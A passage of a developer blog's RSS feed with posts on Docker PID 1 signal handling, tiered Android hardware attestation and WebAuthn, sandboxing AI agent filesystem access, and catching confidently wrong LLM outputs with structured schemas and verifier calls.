    setInterval(() =&gt; console.log('alive'), 1000);</p>
<p>Rebuild and stop. Instant. The container exits in well under a second because PID 1 now actually responds to the signal.</p>
<h2 id="heading-fix-1-handle-signals-in-your-app">Fix #1: Handle signals in your app</h2>
<p>The most correct fix is to handle <code>SIGTERM</code> (and usually <code>SIGINT</code>) in your application code. This is the right answer because your app probably needs to do cleanup anyway: drain HTTP connections, finish in-flight DB writes, flush logs.</p>
<p>For a Node HTTP server:</p>
<p>    const server = http.createServer(handler);
    server.listen(3000);</p>
<p>    function shutdown() {
      console.log('SIGTERM received, draining...');
      // Stop accepting new connections, finish existing ones
      server.close(() =&gt; process.exit(0));
      // Hard stop if drain takes too long
      setTimeout(() =&gt; process.exit(1), 8000).unref();
    }</p>
<p>    process.on('SIGTERM', shutdown);
    process.on('SIGINT', shutdown);</p>
<p>For Python with Flask/Gunicorn, Gunicorn already handles this for you. For a raw script:</p>
<p>    import signal, sys
    def shutdown(signum, frame):
        print('cleaning up')
        sys.exit(0)
    signal.signal(signal.SIGTERM, shutdown)
    signal.signal(signal.SIGINT, shutdown)</p>
<h2 id="heading-fix-2-use-a-proper-init-process">Fix #2: Use a proper init process</h2>
<p>Sometimes you can't modify the app, or you've got a shell script as your entrypoint that spawns multiple children. In that case, run a tiny init process as PID 1 and let <em>it</em> handle signals and zombie reaping.</p>
<p>The usual choice is <a target="_blank" href="https://github.com/krallin/tini">tini</a>, which is around 24KB and does exactly one thing well. Docker actually ships with built-in tini support via the <code>--init</code> flag:</p>
<p>    docker run --init --name demo -d pid1-demo</p>
<p>That's it. Docker injects a small init binary as PID 1, your app becomes PID 2, signals get forwarded properly, and zombies get reaped.</p>
<p>If you want it baked into the image instead of relying on the runtime flag:</p>
<p>    FROM node:20-alpine
    RUN apk add --no-cache tini
    COPY app.js /app.js</p>
<h1 id="heading-tini-becomes-pid-1-and-execs-your-command-as-a-child">tini becomes PID 1 and execs your command as a child</h1>
<p>    ENTRYPOINT ["/sbin/tini", "--"]
    CMD ["node", "/app.js"]</p>
<p>For Debian-based images, swap <code>apk add</code> for <code>apt-get install -y tini</code>. There's also <a target="_blank" href="https://github.com/Yelp/dumb-init">dumb-init</a>, which is similar and slightly different in signal-forwarding behavior. Both are fine.</p>
<h2 id="heading-the-shell-form-cmd-trap">The shell-form CMD trap</h2>
<p>One more gotcha. If you write your <code>CMD</code> in shell form, you actually get <code>sh -c "..."</code> as PID 1, not your app:</p>
<h1 id="heading-shell-form-pid-1-is-binsh-not-node">Shell form — PID 1 is /bin/sh, NOT node</h1>
<p>    CMD node /app.js</p>
<h1 id="heading-exec-form-pid-1-is-node">Exec form — PID 1 is node</h1>
<p>    CMD ["node", "/app.js"]</p>
<p>And <code>sh</code> is <em>also</em> one of those processes that ignores most signals by default. Always prefer exec form unless you genuinely need shell features. If you do need shell expansion, wrap it with <code>exec</code>:</p>
<p>    CMD ["sh", "-c", "exec node /app.js"]</p>
<p>The <code>exec</code> replaces the shell process with node, so node still ends up as PID 1.</p>
<h2 id="heading-prevention-checklist">Prevention checklist</h2>
<p>A few habits that have saved me a lot of debugging time:</p>
<ul>
<li><strong>Default to exec-form <code>CMD</code> and <code>ENTRYPOINT</code>.</strong> It's a one-line change that prevents an entire class of bugs.</li>
<li><strong>Add <code>--init</code> or bake in tini</strong> for any image where you don't fully control the application's signal handling.</li>
<li><strong>Test your shutdown path locally</strong> with <code>time docker stop &lt;container&gt;</code>. If it takes more than two or three seconds, something is wrong. Catch it before production does.</li>
<li><strong>Set sensible <code>stopGracePeriodSeconds</code> in Kubernetes</strong> to match your app's actual drain time. Don't just leave it at the 30-second default and hope.</li>
<li><strong>Log on <code>SIGTERM</code> receipt.</strong> When something goes wrong in production, you want to know whether the signal arrived at all or was silently dropped.</li>
</ul>
<p>The meme version of this is: containers are easy, until they aren't. The boring reality is that Linux process semantics didn't change just because we put a thin namespace wrapper around them. PID 1 is special, signals are easy to drop, and zombies accumulate. Once you internalize that, half the weird container shutdown issues you'll ever see stop being mysterious.</p>
]]></content:encoded></item><item><title><![CDATA[How to handle hardware attestation without locking out real users]]></title><description><![CDATA[Last month I got a bug report that made me close my laptop and go for a walk. A paying user couldn't log in. Their device was rooted? Not according to them. Custom ROM? Yes. A modern, security-hardened Android build with verified boot and hardware-ba...]]></description><link>https://alan-west.hashnode.dev/how-to-handle-hardware-attestation-without-locking-out-real-users</link><guid isPermaLink="true">https://alan-west.hashnode.dev/how-to-handle-hardware-attestation-without-locking-out-real-users</guid><category><![CDATA[Android]]></category><category><![CDATA[authentication]]></category><category><![CDATA[Security]]></category><category><![CDATA[#webauthn]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Mon, 11 May 2026 00:05:05 GMT</pubDate><enclosure url="https://images.pexels.com/photos/8293680/pexels-photo-8293680.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Last month I got a bug report that made me close my laptop and go for a walk. A paying user couldn't log in. Their device was rooted? Not according to them. Custom ROM? Yes. A modern, security-hardened Android build with verified boot and hardware-backed keys. The kind of setup that's arguably <em>more</em> secure than a stock device.</p>
<p>My app rejected them anyway. Why? Because somewhere along the way, I had wired up the strictest integrity verdict I could find and called it a day. Classic mistake.</p>
<p>If you've shipped any mobile app that talks to a backend, you've probably run into the same trap. Let's dig into why hardware attestation locks out legitimate users, and what to actually do about it.</p>
<h2 id="heading-the-frustrating-problem">The frustrating problem</h2>
<p>You add an integrity check to gate sensitive operations — login, payments, key recovery, whatever. The API gives you a verdict. You check the strongest tier. Ship it.</p>
<p>Then the support tickets roll in:</p>
<ul>
<li>Users on alternative Android distributions can't authenticate</li>
<li>Users on older but perfectly functional devices get blocked</li>
<li>Users who happen to use a non-mainstream device manufacturer can't even sign up</li>
<li>Corporate users with managed devices fail randomly</li>
</ul>
<p>And here's the kicker: the people getting blocked are often the most security-conscious users you have. They're running verified boot. Their keys live in a real TEE. The cryptographic chain is solid. But your app treats them like an attacker because a single boolean came back false.</p>
<h2 id="heading-root-cause-attestation-isnt-binary">Root cause: attestation isn't binary</h2>
<p>Hardware attestation was designed to answer one question: "is this key stored in hardware that I trust?" That's it. A clean, useful primitive.</p>
<p>The problem is that platform-level integrity APIs bolt a lot of extra opinions on top:</p>
<ul>
<li>Is the bootloader locked with a specific vendor's key?</li>
<li>Is the OS signed by a specific vendor?</li>
<li>Is this device on an approved allow-list?</li>
<li>Has the device passed a specific certification program?</li>
</ul>
<p>These are policy decisions dressed up as security guarantees. A device can have rock-solid hardware-backed keys <em>and</em> fail these checks — because the checks aren't really about hardware security, they're about ecosystem control.</p>
<p>When your code does this:</p>
<pre><code class="lang-kotlin"><span class="hljs-comment">// DON'T DO THIS</span>
<span class="hljs-keyword">if</span> (verdict.deviceIntegrity != STRONG_INTEGRITY) {
    <span class="hljs-keyword">return</span> AuthResult.Rejected
}
</code></pre>
<p>You're not asking "can I trust this device's cryptographic operations?" You're asking "is this device on the vendor's preferred list?" Those are different questions, and conflating them is how you end up rejecting legitimate users.</p>
<h2 id="heading-step-by-step-solution">Step-by-step solution</h2>
<p>The fix is to build a tiered trust model. Treat attestation as one signal among many, and gate operations based on actual risk — not on a single boolean from a black box.</p>
<h3 id="heading-step-1-verify-the-key-attestation-chain-yourself">Step 1: Verify the key attestation chain yourself</h3>
<p>Instead of relying solely on the platform's verdict, validate the hardware-backed key attestation directly. On Android this means parsing the X.509 certificate chain from a hardware-backed Keystore key and checking the attestation extension.</p>
<pre><code class="lang-kotlin"><span class="hljs-function"><span class="hljs-keyword">fun</span> <span class="hljs-title">verifyKeyAttestation</span><span class="hljs-params">(certChain: <span class="hljs-type">List</span>&lt;<span class="hljs-type">X509Certificate</span>&gt;)</span></span>: AttestationResult {
    <span class="hljs-comment">// Walk the chain back to a known root</span>
    <span class="hljs-keyword">val</span> root = certChain.last()
    <span class="hljs-keyword">if</span> (!isKnownAttestationRoot(root)) {
        <span class="hljs-keyword">return</span> AttestationResult.UnknownRoot
    }

    <span class="hljs-comment">// The leaf cert contains the attestation extension (OID 1.3.6.1.4.1.11129.2.1.17)</span>
    <span class="hljs-keyword">val</span> leaf = certChain.first()
    <span class="hljs-keyword">val</span> extension = leaf.getExtensionValue(<span class="hljs-string">"1.3.6.1.4.1.11129.2.1.17"</span>)
        ?: <span class="hljs-keyword">return</span> AttestationResult.NoAttestation

    <span class="hljs-keyword">val</span> parsed = parseAttestationExtension(extension)

    <span class="hljs-comment">// securityLevel tells us where the key actually lives</span>
    <span class="hljs-keyword">return</span> <span class="hljs-keyword">when</span> (parsed.keymasterSecurityLevel) {
        SECURITY_LEVEL_STRONGBOX -&gt; AttestationResult.StrongBox
        SECURITY_LEVEL_TRUSTED_ENVIRONMENT -&gt; AttestationResult.Tee
        SECURITY_LEVEL_SOFTWARE -&gt; AttestationResult.SoftwareOnly
        <span class="hljs-keyword">else</span> -&gt; AttestationResult.Unknown
    }
}
</code></pre>
<p>This tells you what you actually need to know: where the private key lives. A TEE-backed key is a TEE-backed key, regardless of which OS is running on top.</p>
<p>Google publishes the <a target="_blank" href="https://developer.android.com/privacy-and-security/security-key-attestation">Android Keystore attestation root certificates</a> for verification. Use those.</p>
<h3 id="heading-step-2-tier-your-operations-by-risk">Step 2: Tier your operations by risk</h3>
<p>Not every action needs maximum assurance. Build a matrix:</p>
<pre><code class="lang-kotlin"><span class="hljs-keyword">enum</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TrustTier</span> </span>{ Strong, Standard, Minimal }

<span class="hljs-function"><span class="hljs-keyword">fun</span> <span class="hljs-title">requiredTier</span><span class="hljs-params">(operation: <span class="hljs-type">Operation</span>)</span></span>: TrustTier = <span class="hljs-keyword">when</span> (operation) {
    Operation.Login -&gt; TrustTier.Standard
    Operation.ViewBalance -&gt; TrustTier.Standard
    Operation.TransferUnderLimit -&gt; TrustTier.Standard
    Operation.TransferOverLimit -&gt; TrustTier.Strong
    Operation.ChangeRecoveryEmail -&gt; TrustTier.Strong
    Operation.ReadOnlyPublicData -&gt; TrustTier.Minimal
}
</code></pre>
<p>A user who can't pass Strong-tier checks should still be able to log in and see their account. They just hit step-up authentication for high-risk operations.</p>
<h3 id="heading-step-3-add-server-side-signal-fusion">Step 3: Add server-side signal fusion</h3>
<p>Device attestation is one input. On the server, combine it with everything else you know:</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">assess_risk</span>(<span class="hljs-params">session</span>):</span>
    score = <span class="hljs-number">0</span>

    <span class="hljs-comment"># Attestation signal — graded, not binary</span>
    <span class="hljs-keyword">if</span> session.attestation == <span class="hljs-string">'strongbox'</span>:
        score += <span class="hljs-number">40</span>
    <span class="hljs-keyword">elif</span> session.attestation == <span class="hljs-string">'tee'</span>:
        score += <span class="hljs-number">30</span>
    <span class="hljs-keyword">elif</span> session.attestation == <span class="hljs-string">'software'</span>:
        score += <span class="hljs-number">10</span>

    <span class="hljs-comment"># Behavioral signals carry real weight</span>
    <span class="hljs-keyword">if</span> session.device_known_for_account(days=<span class="hljs-number">30</span>):
        score += <span class="hljs-number">25</span>
    <span class="hljs-keyword">if</span> session.ip_in_user_history():
        score += <span class="hljs-number">15</span>
    <span class="hljs-keyword">if</span> session.geo_consistent_with_recent():
        score += <span class="hljs-number">10</span>

    <span class="hljs-comment"># Negative signals</span>
    <span class="hljs-keyword">if</span> session.velocity_anomaly():
        score -= <span class="hljs-number">30</span>
    <span class="hljs-keyword">if</span> session.is_known_bad_asn():
        score -= <span class="hljs-number">20</span>

    <span class="hljs-keyword">return</span> score
</code></pre>
<p>A score above your threshold gets through. Below it, you challenge — TOTP, WebAuthn, email confirmation. You almost never need to hard-reject.</p>
<h3 id="heading-step-4-use-webauthn-as-your-primary-trust-anchor">Step 4: Use WebAuthn as your primary trust anchor</h3>
<p>If you really care about phishing-resistant auth and device binding, the standardized answer is <a target="_blank" href="https://www.w3.org/TR/webauthn-3/">WebAuthn</a>. It uses the same hardware-backed keys, gives you cryptographic proof of possession, and doesn't depend on a single vendor's integrity verdict.</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Client-side registration — relies on the platform authenticator's hardware</span>
<span class="hljs-keyword">const</span> credential = <span class="hljs-keyword">await</span> navigator.credentials.create({
  <span class="hljs-attr">publicKey</span>: {
    <span class="hljs-attr">challenge</span>: serverChallenge,
    <span class="hljs-attr">rp</span>: { <span class="hljs-attr">name</span>: <span class="hljs-string">'My App'</span> },
    <span class="hljs-attr">user</span>: { <span class="hljs-attr">id</span>: userId, <span class="hljs-attr">name</span>: email, <span class="hljs-attr">displayName</span>: name },
    <span class="hljs-attr">pubKeyCredParams</span>: [{ <span class="hljs-attr">type</span>: <span class="hljs-string">'public-key'</span>, <span class="hljs-attr">alg</span>: <span class="hljs-number">-7</span> }], <span class="hljs-comment">// ES256</span>
    <span class="hljs-attr">authenticatorSelection</span>: {
      <span class="hljs-attr">authenticatorAttachment</span>: <span class="hljs-string">'platform'</span>,
      <span class="hljs-attr">userVerification</span>: <span class="hljs-string">'required'</span>,
      <span class="hljs-attr">residentKey</span>: <span class="hljs-string">'preferred'</span>,
    },
    <span class="hljs-comment">// attestation: 'none' is fine for most apps — you get the hardware binding</span>
    <span class="hljs-comment">// without locking out users whose attestation cert isn't on an allow-list</span>
    <span class="hljs-attr">attestation</span>: <span class="hljs-string">'none'</span>,
  },
});
</code></pre>
<p>Using <code>attestation: 'none'</code> is the key detail. You still get hardware-backed key storage and the phishing-resistance benefits. You just don't gate on a specific vendor's signature being present.</p>
<h2 id="heading-prevention-tips">Prevention tips</h2>
<p>A few habits that save you from this whole class of bug:</p>
<ul>
<li><strong>Log every attestation rejection with full context.</strong> When users complain, you need to see exactly which signal failed and what their device looked like.</li>
<li><strong>Test on at least one non-stock device.</strong> Borrow one if you have to. The bug you'll find is almost always real.</li>
<li><strong>Document your trust model explicitly.</strong> Write down which operations need which tier and why. Future-you will rip out a lot of the gates once you see them in writing.</li>
<li><strong>Never put the integrity check in the critical login path without a fallback.</strong> A vendor API outage shouldn't lock out 100% of your users.</li>
<li><strong>Treat attestation verdicts as advisory, not authoritative.</strong> The actual question is "do I have enough confidence to permit this specific action?" — that's a server-side judgment call, not a client-side boolean.</li>
</ul>
<p>The deeper lesson here is that security and ecosystem control got entangled, and we shipped libraries that conflate them. As app developers we don't have to play along. The cryptographic primitives — hardware-backed keys, attestation chains, WebAuthn — work fine on their own. Use those directly, and you get real security without telling your most careful users to go away.</p>
]]></content:encoded></item><item><title><![CDATA[Sandboxing AI Agent Filesystems: Containers vs Virtual FS Layers]]></title><description><![CDATA[If you've ever wired up an AI agent to do real work, you've probably hit the same wall I did: filesystem access is a minefield. Give it too much rope and it'll happily rm -rf something important. Lock it down too hard and it can't actually do anythin...]]></description><link>https://alan-west.hashnode.dev/sandboxing-ai-agent-filesystems-containers-vs-virtual-fs-layers</link><guid isPermaLink="true">https://alan-west.hashnode.dev/sandboxing-ai-agent-filesystems-containers-vs-virtual-fs-layers</guid><category><![CDATA[agents]]></category><category><![CDATA[AI]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Tutorial]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 10 May 2026 20:08:41 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483870/pexels-photo-17483870.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you've ever wired up an AI agent to do real work, you've probably hit the same wall I did: filesystem access is a minefield. Give it too much rope and it'll happily <code>rm -rf</code> something important. Lock it down too hard and it can't actually do anything useful.</p>
<p>I've been bouncing between three approaches over the last year — raw FS access with allowlists, container-based isolation, and most recently a virtual filesystem layer. Each has real tradeoffs. The trending <a target="_blank" href="https://github.com/strukto-ai/mirage">strukto-ai/mirage</a> project pitches itself as a unified virtual filesystem for AI agents, which got me thinking about when this approach actually makes sense versus the alternatives. I'll be honest up front: I've only skimmed Mirage's repo and poked at the examples, so treat my notes on it as provisional rather than a deep review.</p>
<h2 id="heading-why-this-is-harder-than-it-looks">Why this is harder than it looks</h2>
<p>When a coding agent says "read this file," what should that actually do? In a naive setup, the agent process can read anything the host user can read. That's fine for a throwaway VM. It's terrifying on a dev laptop with SSH keys and tokens sitting around.</p>
<p>The three things I want from any FS access layer:</p>
<ul>
<li><strong>Bounded blast radius</strong> — the agent can't escape its assigned working set</li>
<li><strong>Reversibility</strong> — I can review and roll back changes before they hit disk for real</li>
<li><strong>Predictable paths</strong> — the agent sees the same paths whether it's running locally, in CI, or on a remote sandbox</li>
</ul>
<p>Most setups give you one or two of these. Getting all three is where the design choices get interesting.</p>
<h2 id="heading-approach-1-raw-fs-with-allowlists">Approach 1: Raw FS with allowlists</h2>
<p>This is the baseline. You hand the agent a working directory and trust it to behave.</p>
<pre><code class="lang-python"><span class="hljs-comment"># Naive approach: agent gets a working dir, full access inside it</span>
<span class="hljs-keyword">from</span> pathlib <span class="hljs-keyword">import</span> Path

WORK_DIR = Path(<span class="hljs-string">"/tmp/agent-workspace"</span>).resolve()

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">safe_read</span>(<span class="hljs-params">rel_path: str</span>) -&gt; str:</span>
    <span class="hljs-comment"># Re-resolve every call to defeat symlink shenanigans</span>
    target = (WORK_DIR / rel_path).resolve()
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> target.is_relative_to(WORK_DIR):
        <span class="hljs-keyword">raise</span> PermissionError(<span class="hljs-string">"path escapes workspace"</span>)
    <span class="hljs-keyword">return</span> target.read_text()

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">safe_write</span>(<span class="hljs-params">rel_path: str, content: str</span>) -&gt; <span class="hljs-keyword">None</span>:</span>
    target = (WORK_DIR / rel_path).resolve()
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> target.is_relative_to(WORK_DIR):
        <span class="hljs-keyword">raise</span> PermissionError(<span class="hljs-string">"path escapes workspace"</span>)
    target.write_text(content)
</code></pre>
<p><strong>Where this works:</strong> quick experiments, throwaway scripts, anything where the workspace is already disposable.</p>
<p><strong>Where it falls over:</strong> symlinks (an agent that creates <code>link -&gt; /etc</code> and then writes through it can slip past a sloppy check), TOCTOU races, and the simple fact that "undo the last 30 minutes of agent work" becomes a git stash scavenger hunt.</p>
<h2 id="heading-approach-2-container-isolation">Approach 2: Container isolation</h2>
<p>The next step up is putting the whole agent in a container with a bind-mounted workspace.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Run the agent inside a container, only mount what it needs</span>
docker run --rm \
  --network=none \
  -v <span class="hljs-string">"<span class="hljs-variable">$PWD</span>/workspace:/work:rw"</span> \
  -v <span class="hljs-string">"<span class="hljs-variable">$PWD</span>/readonly-context:/ctx:ro"</span> \
  --read-only \
  --tmpfs /tmp:size=512m \
  agent-image:latest
</code></pre>
<p>This is what I default to for anything touching real code. The blast radius is genuinely bounded — even if the agent goes off the rails, it can only mess up <code>/work</code>.</p>
<p>The downside is startup cost and the friction of getting tooling into the container. Every new language runtime, every binary the agent might invoke, has to be pre-baked into the image or installed at runtime. I've spent more time debugging "why doesn't <code>node</code> exist in here" than I'd like to admit.</p>
<h2 id="heading-approach-3-a-virtual-filesystem-layer">Approach 3: A virtual filesystem layer</h2>
<p>This is where projects like Mirage come in. The pitch, as I read it, is that the agent talks to a virtual filesystem API instead of the real FS, and the layer underneath decides what actually happens — overlay changes in memory, commit them on confirmation, expose a consistent path namespace across backends. Check the <a target="_blank" href="https://github.com/strukto-ai/mirage">official repo</a> before relying on specifics; the project looks early and the API surface may shift.</p>
<p>Conceptually, the pattern looks like this:</p>
<pre><code class="lang-python"><span class="hljs-comment"># Sketch of the virtual FS pattern (not Mirage's exact API)</span>
fs = VirtualFS(
    root=<span class="hljs-string">"./project"</span>,   <span class="hljs-comment"># underlying real directory</span>
    mode=<span class="hljs-string">"overlay"</span>,     <span class="hljs-comment"># writes go to an overlay, not the real FS</span>
)

<span class="hljs-comment"># Agent calls look like normal FS ops</span>
fs.write(<span class="hljs-string">"src/app.py"</span>, new_content)
fs.read(<span class="hljs-string">"README.md"</span>)

<span class="hljs-comment"># But changes are staged, not committed</span>
diff = fs.pending_changes()  <span class="hljs-comment"># inspect what the agent did</span>
fs.commit()                  <span class="hljs-comment"># apply to real FS</span>
<span class="hljs-comment"># or</span>
fs.discard()                 <span class="hljs-comment"># throw it all away</span>
</code></pre>
<p>What I like about this model:</p>
<ul>
<li><strong>Review-before-apply is built in.</strong> The agent can do 50 file edits and I get to see the diff before any of them touch disk.</li>
<li><strong>Path consistency.</strong> The agent always sees <code>./src/app.py</code>, regardless of whether the backend is a local dir, an object store, or an in-memory overlay.</li>
<li><strong>Cheaper than containers</strong> for the common case of "edit some files, run some checks."</li>
</ul>
<p>What I'm cautious about:</p>
<ul>
<li>It's another abstraction layer. When something breaks, you're now debugging the agent, the VFS, and the underlying storage.</li>
<li>Isolation is logical, not physical. If the agent shells out to a subprocess, that subprocess sees the real FS unless you also wrap exec calls. A container actually contains; a virtual FS doesn't, by itself.</li>
<li>It's new. I haven't tested Mirage thoroughly enough to vouch for edge cases like large binary files, partial writes, or concurrent agents on the same overlay.</li>
</ul>
<h2 id="heading-side-by-side">Side by side</h2>
<div class="hn-table">
<table>
<thead>
<tr>
<td></td><td>Raw FS + allowlist</td><td>Container</td><td>Virtual FS layer</td></tr>
</thead>
<tbody>
<tr>
<td>Setup cost</td><td>Lowest</td><td>Highest</td><td>Medium</td></tr>
<tr>
<td>Blast radius</td><td>Workspace dir (if careful)</td><td>Container boundary</td><td>Logical workspace</td></tr>
<tr>
<td>Subprocess isolation</td><td>None</td><td>Yes</td><td>None (unless wrapped)</td></tr>
<tr>
<td>Review before apply</td><td>Manual (git)</td><td>Manual (git)</td><td>Built into the model</td></tr>
<tr>
<td>Startup latency</td><td>None</td><td>Seconds</td><td>Milliseconds</td></tr>
<tr>
<td>Good for</td><td>Quick scripts</td><td>Real code changes</td><td>Iterative agent loops</td></tr>
</tbody>
</table>
</div><h2 id="heading-how-id-pick-today">How I'd pick today</h2>
<p>If I'm running a coding agent against a repo I care about, I'm still reaching for containers first. The physical isolation is just too valuable when an agent decides to get creative with <code>find -delete</code>.</p>
<p>If I'm building an interactive loop — agent proposes changes, I approve, agent continues — a virtual FS layer is genuinely better. The commit/discard semantics map directly onto the workflow, and you skip the container startup tax on every iteration.</p>
<p>If I'm prototyping and the workspace is already disposable, raw FS with a path-resolution check is fine. Don't over-engineer it.</p>
<h2 id="heading-a-migration-sketch">A migration sketch</h2>
<p>If you're currently on raw FS and want to try a VFS layer, the migration is less invasive than you'd expect:</p>
<pre><code class="lang-python"><span class="hljs-comment"># Before: direct FS calls scattered through the agent's tools</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">read_file_tool</span>(<span class="hljs-params">path: str</span>) -&gt; str:</span>
    <span class="hljs-keyword">return</span> Path(path).read_text()

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">write_file_tool</span>(<span class="hljs-params">path: str, content: str</span>) -&gt; <span class="hljs-keyword">None</span>:</span>
    Path(path).write_text(content)

<span class="hljs-comment"># After: same interface, FS calls go through the virtual layer</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">read_file_tool</span>(<span class="hljs-params">path: str</span>) -&gt; str:</span>
    <span class="hljs-keyword">return</span> fs.read(path)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">write_file_tool</span>(<span class="hljs-params">path: str, content: str</span>) -&gt; <span class="hljs-keyword">None</span>:</span>
    fs.write(path, content)  <span class="hljs-comment"># staged, not yet on disk</span>

<span class="hljs-comment"># New control surface: review/commit between agent steps</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">step_complete</span>():</span>
    show_diff(fs.pending_changes())
    <span class="hljs-keyword">if</span> user_approves():
        fs.commit()
    <span class="hljs-keyword">else</span>:
        fs.discard()
</code></pre>
<p>The tool interface barely changes. What changes is the control loop around it — you now have a place to insert review and approval that you didn't have before.</p>
<p>That's the real reason I'm watching this category. Containers won the "how do we sandbox processes" question a decade ago. The "how do we sandbox an agent's <em>intentions</em> before they become actions" question is still wide open, and a virtual filesystem is one of the more interesting answers I've seen lately.</p>
]]></content:encoded></item><item><title><![CDATA[Debugging confidently wrong answers from LLM-powered features]]></title><description><![CDATA[The bug that took two weeks to surface
A few months back I shipped a feature that used a language model to summarize support tickets and suggest responses. Internal QA loved it. The demo went great. Two weeks after launch, our support lead pinged me ...]]></description><link>https://alan-west.hashnode.dev/debugging-confidently-wrong-answers-from-llm-powered-features</link><guid isPermaLink="true">https://alan-west.hashnode.dev/debugging-confidently-wrong-answers-from-llm-powered-features</guid><category><![CDATA[AI]]></category><category><![CDATA[debugging]]></category><category><![CDATA[llm]]></category><category><![CDATA[webdev]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 10 May 2026 16:50:23 GMT</pubDate><enclosure url="https://images.pexels.com/photos/51165/cpu-processor-electronics-computer-51165.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-the-bug-that-took-two-weeks-to-surface">The bug that took two weeks to surface</h2>
<p>A few months back I shipped a feature that used a language model to summarize support tickets and suggest responses. Internal QA loved it. The demo went great. Two weeks after launch, our support lead pinged me on Slack: "Are these summaries... making things up?"</p>
<p>They were. Not always. Maybe one in fifty. But the ones that were wrong looked exactly as confident as the correct ones — same tone, same structure, same plausible-looking detail. A ticket about a failed payment got summarized as "user wants to cancel subscription." A complaint about slow load times got rephrased as "user reports outage in EU region."</p>
<p>If you've shipped anything LLM-backed in production, this story is probably familiar. The model isn't broken. The benchmark scores look great. But the tail is full of confidently wrong answers, and your users are the ones finding them.</p>
<p>Here's what I learned debugging this, and the layered approach that finally got our hallucination rate down to something I could live with.</p>
<h2 id="heading-why-this-happens-and-why-its-hard-to-catch">Why this happens (and why it's hard to catch)</h2>
<p>The first thing to internalize: a language model produces fluent text whether or not the underlying reasoning is sound. There's no "I'm not sure" signal you can read off the surface output. The model that confidently invents a detail and the model that confidently states a true fact look identical from your application's perspective.</p>
<p>Worse, evaluation suites usually skew toward typical inputs. Your eval probably hits the median case. Production traffic hits the tail — weird formatting, unusual entities, contradictory context, ambiguous pronouns, multi-language messages. Tail behavior is where hallucinations live.</p>
<p>In our case, the model was misreading tickets where the customer mentioned multiple unrelated topics. The summarizer would latch onto whichever topic appeared first or had the strongest sentiment, and confidently summarize <em>that</em> as the whole ticket.</p>
<h2 id="heading-step-1-constrain-the-output-structure">Step 1: Constrain the output structure</h2>
<p>Free-form prose gives the model room to confabulate smoothly. Constraining the output forces it to commit to specific claims you can verify.</p>
<p>Instead of asking for a summary, I asked for a structured object:</p>
<pre><code class="lang-python"><span class="hljs-comment"># Bad: free-form prose, hard to validate</span>
prompt = <span class="hljs-string">f"Summarize this ticket:\n<span class="hljs-subst">{ticket}</span>"</span>

<span class="hljs-comment"># Better: structured claims we can check one by one</span>
schema = {
    <span class="hljs-string">"primary_issue"</span>: <span class="hljs-string">"str"</span>,        <span class="hljs-comment"># one short phrase, must appear in source</span>
    <span class="hljs-string">"customer_intent"</span>: <span class="hljs-string">"enum[refund, cancel, technical_help, billing, other]"</span>,
    <span class="hljs-string">"mentioned_order_ids"</span>: <span class="hljs-string">"list[str]"</span>,
    <span class="hljs-string">"sentiment"</span>: <span class="hljs-string">"enum[neutral, frustrated, angry]"</span>,
    <span class="hljs-string">"requires_human"</span>: <span class="hljs-string">"bool"</span>,
}
</code></pre>
<p>JSON Schema or function-calling features from most providers work even better, since they constrain at the decoding layer. The point is: you want discrete claims, not paragraphs. Claims you can check. Prose you cannot.</p>
<h2 id="heading-step-2-add-a-verifier-pass">Step 2: Add a verifier pass</h2>
<p>This was the change that actually moved the needle. Run the output through a second model call whose only job is to check whether each claim is supported by the source.</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">verify_claim</span>(<span class="hljs-params">source_text: str, claim: str</span>) -&gt; str:</span>
    prompt = (
        <span class="hljs-string">"You are a strict fact-checker. Given the SOURCE and the CLAIM,\n"</span>
        <span class="hljs-string">"answer with exactly one word: YES, NO, or UNCERTAIN.\n"</span>
        <span class="hljs-string">"YES means the claim is explicitly supported by the source.\n"</span>
        <span class="hljs-string">f"SOURCE:\n<span class="hljs-subst">{source_text}</span>\n\nCLAIM:\n<span class="hljs-subst">{claim}</span>\n\nANSWER:"</span>
    )
    <span class="hljs-keyword">return</span> call_llm(prompt, max_tokens=<span class="hljs-number">4</span>).strip().upper()

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">accept</span>(<span class="hljs-params">source, output</span>) -&gt; bool:</span>
    <span class="hljs-comment"># Treat UNCERTAIN as failure on high-stakes paths.</span>
    <span class="hljs-keyword">for</span> claim <span class="hljs-keyword">in</span> output.claims():
        <span class="hljs-keyword">if</span> verify_claim(source, claim) != <span class="hljs-string">"YES"</span>:
            <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>
    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre>
<p>A few things matter for the verifier:</p>
<ul>
<li>Use a different prompt structure than the generator. You don't want correlated failure modes.</li>
<li>Force a discrete answer (YES/NO/UNCERTAIN). No prose, no chain-of-thought leaking into the output.</li>
<li>Treat UNCERTAIN as failure for high-stakes outputs. Cheap, conservative, surprisingly effective.</li>
